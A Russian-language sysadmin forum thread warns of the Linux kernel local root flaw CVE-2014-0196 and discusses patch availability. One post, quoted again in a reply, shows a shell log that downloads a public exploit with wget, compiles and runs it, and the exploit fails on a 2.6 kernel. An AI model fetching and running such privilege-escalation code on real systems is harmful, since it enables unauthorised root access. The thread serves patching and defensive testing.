Сисадминам: срочно обновляйте ядра (!)

soko1
На сайте с 02.05.2014
Offline
3
1942

(все ссылки по пруфу, включая сам эксплойт)

В ядре Linux обнаружена критическая уязвимость (CVE-2014-0196), позволяющая локальному пользователю получить привилегии пользователя root. Проблему усугубляет публикация прототипа эксплоита в открытом доступе.

Уязвимость присутствует во всех выпусках ядра, начиная с 2.6.31-rc3, включая 3.14.3 и 3.15-rc5. Исправление пока доступно в виде патча. Обновления пакетов с устранением уязвимости уже сформированы для Ubuntu и Fedora. Для Debian, Gentoo, Red Hat Entreprise Linux, CentOS, openSUSE и SUSE обновление ядра пока недоступно и находится на стадии подготовки.

Проблема вызвана ошибкой в функции n_tty_write (drivers/tty/n_tty.c), в которой некорректно обрабатывалась ситуация доступа к виртуальному терминалу при использовании флагов "LECHO & !OPOST", что позволяло локальному пользователю инициировать повреждение областей памяти ядра. Используя условия гонки уязвимость позволяет добиться выполнения привилегированных команд во время выполнения из нескольких потоков одновременных операций чтения и записи длинных строк через псевдотерминал. Успешность эксплуатации является делом случая, при применении эксплоита в 3 из 4 запусков наблюдается крах ядра.

Оперативно поможем вам в решении ваших проблем: /ru/forum/814513 (/ru/forum/814513)
Romka_Kharkov
На сайте с 08.04.2009
Offline
485
#1

Обсуждение уже идет вот тут

/ru/forum/comment/12848817

Тема создана за 15 минут до вашей :)

Есть около 15.000 ipv4 !!! (http://onyx.net.ua/price.php#ipv4) Качественный хостинг с 2005 года - лучшее клиентам! (http://onyx.net.ua/)
pupseg
На сайте с 14.05.2010
Offline
347
#2

чето нифига ....

[testuser@ip-static ~]$ wget http://bugfuzz.com/stuff/cve-2014-0196-md.c
--2014-05-13 08:16:26-- http://bugfuzz.com/stuff/cve-2014-0196-md.c
Resolving bugfuzz.com... 71.19.145.114
Connecting to bugfuzz.com|71.19.145.114|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5305 (5.2K) [text/plain]
Saving to: `cve-2014-0196-md.c'

100%[=================================================================================================>] 5,305 --.-K/s in 0s

2014-05-13 08:16:27 (436 MB/s) - `cve-2014-0196-md.c' saved [5305/5305]


[testuser@ip-static ~]$ gcc cve-2014-0196-md.c -lutil -lpthread
[testuser@ip-static ~]$ ls -al
total 52
drwxr-xr-x 2 testuser testuser 4096 May 13 08:16 .
drwxr-xr-x. 3 root root 4096 May 13 08:13 ..
-rwxr-xr-x 1 testuser testuser 18 Jul 18 2013 .bash_logout
-rwxr-xr-x 1 testuser testuser 176 Jul 18 2013 .bash_profile
-rwxr-xr-x 1 testuser testuser 124 Jul 18 2013 .bashrc
-rwxrwxr-x 1 testuser testuser 11327 May 13 08:16 a.out
-rw-rw-r-- 1 testuser testuser 5305 May 12 13:13 cve-2014-0196-md.c
[testuser@ip-static ~]$ ./a.out
[+] Resolving symbols
[+] Resolved commit_creds: (nil)
[+] Resolved prepare_kernel_cred: (nil)
[testuser@ip-static ~]$

хотя от рута запущенный - работает. но от рута - не интересно:)

Качественная помощь в обслуживании серверов. (/ru/forum/661100) Бесплатных консультаций не даю, не помогаю, не обучаю. Минималка от 100$. Как пропатчить KDE-просьба не спрашивать. Есть форумы (http://linux.org.ru) и полезные сайты (http://www.opennet.ru/).
soko1
На сайте с 02.05.2014
Offline
3
#3
Romka_Kharkov:
Обсуждение уже идет вот тут
/ru/forum/comment/12848817
Тема создана за 15 минут до вашей :)

Хех, бывает :)

---------- Добавлено 13.05.2014 в 15:03 ----------

pupseg:
чето нифига ....


[testuser@ip-static ~]$ wget http://bugfuzz.com/stuff/cve-2014-0196-md.c

--2014-05-13 08:16:26-- http://bugfuzz.com/stuff/cve-2014-0196-md.c
Resolving bugfuzz.com... 71.19.145.114
Connecting to bugfuzz.com|71.19.145.114|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5305 (5.2K) [text/plain]
Saving to: `cve-2014-0196-md.c'

100%[=================================================================================================>] 5,305 --.-K/s in 0s

2014-05-13 08:16:27 (436 MB/s) - `cve-2014-0196-md.c' saved [5305/5305]


[testuser@ip-static ~]$ gcc cve-2014-0196-md.c -lutil -lpthread
[testuser@ip-static ~]$ ls -al
total 52
drwxr-xr-x 2 testuser testuser 4096 May 13 08:16 .
drwxr-xr-x. 3 root root 4096 May 13 08:13 ..
-rwxr-xr-x 1 testuser testuser 18 Jul 18 2013 .bash_logout
-rwxr-xr-x 1 testuser testuser 176 Jul 18 2013 .bash_profile
-rwxr-xr-x 1 testuser testuser 124 Jul 18 2013 .bashrc
-rwxrwxr-x 1 testuser testuser 11327 May 13 08:16 a.out
-rw-rw-r-- 1 testuser testuser 5305 May 12 13:13 cve-2014-0196-md.c
[testuser@ip-static ~]$ ./a.out
[+] Resolving symbols
[+] Resolved commit_creds: (nil)
[+] Resolved prepare_kernel_cred: (nil)
[testuser@ip-static ~]$


хотя от рута запущенный - работает. но от рута - не интересно:)
От рута и не интересно и бесполезно :) А какое ядро у вас?
pupseg
На сайте с 14.05.2010
Offline
347
#4

[root@ip-static ~]# rpm -qa | grep kernel

kernel-firmware-2.6.32-358.18.1.el6.noarch

kernel-headers-2.6.32-431.17.1.el6.x86_64

dracut-kernel-004-303.el6.noarch

kernel-2.6.32-358.el6.x86_64

kernel-2.6.32-358.18.1.el6.x86_64

[root@ip-static ~]# uname -a

Linux ip-static.net 2.6.32-358.18.1.el6.x86_64 #1 SMP Wed Aug 28 17:19:38 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

[root@ip-static ~]#

soko1
На сайте с 02.05.2014
Offline
3
#5
pupseg:
[root@ip-static ~]# rpm -qa | grep kernel
kernel-firmware-2.6.32-358.18.1.el6.noarch
kernel-headers-2.6.32-431.17.1.el6.x86_64
dracut-kernel-004-303.el6.noarch
kernel-2.6.32-358.el6.x86_64
kernel-2.6.32-358.18.1.el6.x86_64
[root@ip-static ~]# uname -a
Linux ip-static.net 2.6.32-358.18.1.el6.x86_64 #1 SMP Wed Aug 28 17:19:38 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
[root@ip-static ~]#

На 2.6 у меня вообще нигде эксплойт не сработал. Такое чувство что автор ошибся.

Кстати, сайт с тем эксплойтом уже не доступен. Наверное их же этим эксплойтом и положили :D

Андрей
На сайте с 30.09.2009
Offline
482
#6

soko1, просто тот эксплоит работал только с >=3.14.

EuroHoster.org ( https://eurohoster.org/ru/ ) - территория быстрых серверов. Выделенные серверы, VPS, SSL, домены и VPN.
soko1
На сайте с 02.05.2014
Offline
3
#7
WapGraf:
soko1, просто тот эксплоит работал только с >=3.14.

Угу, вот только на лоре и опеннете написали о 2.6, вероятнее всего ошиблись.

Андрей
На сайте с 30.09.2009
Offline
482
#8

soko1, после появился в сети еще и другой эксплоит. Не знаю который вы использовали. Но судя по тому что писали:

Кстати, сайт с тем эксплойтом уже не доступен. Наверное их же этим эксплойтом и положили

то о том же о коротом я говорю. Т.е только для >=3.14.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий